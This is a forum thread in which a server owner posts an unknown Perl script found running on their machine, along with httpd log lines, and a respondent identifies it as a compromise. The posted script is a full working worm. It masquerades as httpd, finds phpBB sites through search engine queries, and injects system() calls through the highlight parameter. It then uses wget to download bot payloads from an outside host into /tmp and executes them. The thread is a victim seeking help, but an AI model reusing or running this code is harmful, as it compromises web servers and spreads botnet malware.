unknow heavy perl running to get something

C

cttsite

Verified User
Joined
Jan 16, 2005
Messages
22
anyone to tell me what is this
and how to stop it

thanks


Code: 
use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd'; 
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $s= (int(rand(1000)));
    if ($rnd>1000) { $s= (int(rand(100)))}
 
    

    my @str=(
             "%22View+topic%22+2.0.4+",
             "%22View+topic%22+2.0.5+",
	     "%22View+topic%22+2.0.6+",
	     "%22View+topic%22+2.0.7+",
             "%22View+topic%22+2.0.8+",
             "%22View+topic%22+2.0.9+",
             "%22View+topic%22+2.0.10+",
	     "%22View+topic%22+2.0.3+",
             "%22View+topic%22+2.0.2+", 

 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
    
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };    
    return $page;

}

sub encode($) {
    my $s = shift;
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
    $s =~ s/%252E$//;
    return $s;
}



eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600; 
my $page="";
my @urls;
my $url;






while(time<$oneday){
    @urls=fetch();
    foreach $url (@urls) {
	if ($url !~ /viewtopic.php/) {next;}
	$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
	my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
	$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	$page = http_query($url);
	if ( $page =~ /jSVowMsd/ ){
	    $url =~ s/&highlight.*//;
	    my $upload=$url;
	    $upload =~ s/viewtopic.*//;
	    $cmd="wget [url]http://www.pivadesign.com.br/rc/linuxday.txt[/url] -O /tmp/.sql.err.3792 ;perl /tmp/.sql.err.3792";    # set cmd
	    $cmd=encode("$cmd");    # set cmd
	    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	    $page = http_query($url);
	    $cmd="wget [url]http://www.pivadesign.com.br/rc/linuxdaybot.txt[/url] -O /tmp/.sql.err.3913; perl /tmp/.sql.err.3913; touch /tmp/.doente";   
	    $cmd=encode("$cmd");    # set cmd
	    $url =~ s/&highlight.*//;
	    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	    $page = http_query($url);
	}

    }
}
 
httpd error log

Code: 
HTTP request sent, awaiting response... [Thu Feb 23 23:40:39 2006] [error] [client 222.84.60.19] File does not exist: /var/www/html/tracker/tracker.php
200 OK
Length: 2,966 [text/plain]

    0K .[Thu Feb 23 23:40:39 2006] [error] [client 202.108.1.5] File does not exist: /var/www/html/bbs/forumdisplay.php
.                                                    100%    7.10 KB/s

23:40:39 (7.10 KB/s) - `/tmp/.sql.err.3792' saved [2,966/2,966]
 
This looks like the kind of thread I skip over because there's not enough information in it.

For example, you didn't say where that code came from, or it's name, or the path you found it in.

However I'll answer because I did notice it does a WGET.

It's a system compromise.

Turn it off (chmod it 000), then figure out how it got on your server.

And read it so you'll know that it could have caused your system to be hosting WAREZ or other malware.

Jeff
 
You must log in or register to reply here.
Back
Top